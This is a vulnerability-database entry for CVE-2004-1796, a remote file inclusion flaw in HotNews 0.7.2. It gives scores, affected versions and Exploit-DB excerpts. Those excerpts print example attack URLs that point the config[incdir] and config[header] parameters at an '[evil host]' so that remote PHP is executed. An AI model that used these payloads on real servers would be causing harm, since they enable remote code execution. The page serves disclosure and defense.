CVE-2004-1796
published 2004-12-31CVE-2004-1796: PHP remote file inclusion vulnerability in HotNews 0.7.2 and earlier allows remote attackers to execute arbitrary PHP code via the (1) config[header] parameter…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.32%
94.8th percentile
PHP remote file inclusion vulnerability in HotNews 0.7.2 and earlier allows remote attackers to execute arbitrary PHP code via the (1) config[header] parameter to hotnews-engine.inc.php3 or (2) config[incdir] parameter to hnmain.inc.php3.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
| hotnews | hotnews | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HotNews 0.7.2 - Remote File Inclusion
exploitdb·2010-04-11
CVE-2004-1796 HotNews 0.7.2 - Remote File Inclusion
HotNews 0.7.2 - Remote File Inclusion
---
== @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ ==
== @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ ==
== @@ @@ @@ @@ @@ @ @ @@ @@ @@ @@ @@ @@ ==
== @@ @@ @@ @@ @@ @ @ @@ @@ @@ @@ @@ @@ ==
== @@ @@@@@@ @@@@@@@ @@ @ @@ @@@@@@ @@ @@ @@ @@@@@@ ==
== @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ ==
== @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ ==
== @@ @@@@@@ @@ @@ @@ @@ @@@@@@ @@@@@@ @@ @@ @@@@@@ ==
== @@ @@@@@@ @@ @@ @@ @@ @@@@@@@@@@ @@@@@@ @@@@@@ @@ @@ @@@@@@ ==
== ==
||| |||
||| |||
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
[[ [[
[[ HotNews 0.7.2 Remote File Inclusion Vulnerability [[
[[ [[
[[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.g
Exploit-DB
HotNews 0.x - 'config[incdir]' Remote File Inclusion
exploitdb·2004-01-05
CVE-2004-1796 HotNews 0.x - 'config[incdir]' Remote File Inclusion
HotNews 0.x - 'config[incdir]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/9357/info
HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.
http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3
Exploit-DB
HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion
exploitdb·2004-01-05
CVE-2004-1796 HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion
HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/9357/info
HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.
http://www.example.com/includes/hotnews-engine.inc.php3?config[header]=http://[evil host]/[evil file]
No writeups or analysis indexed.
http://secunia.com/advisories/10551http://securitytracker.com/id?1008608http://sourceforge.net/forum/forum.php?forum_id=342594http://www.osvdb.org/3332http://www.osvdb.org/3405http://www.securityfocus.com/archive/1/348840http://www.securityfocus.com/bid/9357https://exchange.xforce.ibmcloud.com/vulnerabilities/14140http://secunia.com/advisories/10551http://securitytracker.com/id?1008608http://sourceforge.net/forum/forum.php?forum_id=342594http://www.osvdb.org/3332http://www.osvdb.org/3405http://www.securityfocus.com/archive/1/348840http://www.securityfocus.com/bid/9357https://exchange.xforce.ibmcloud.com/vulnerabilities/14140
2004-12-31
Published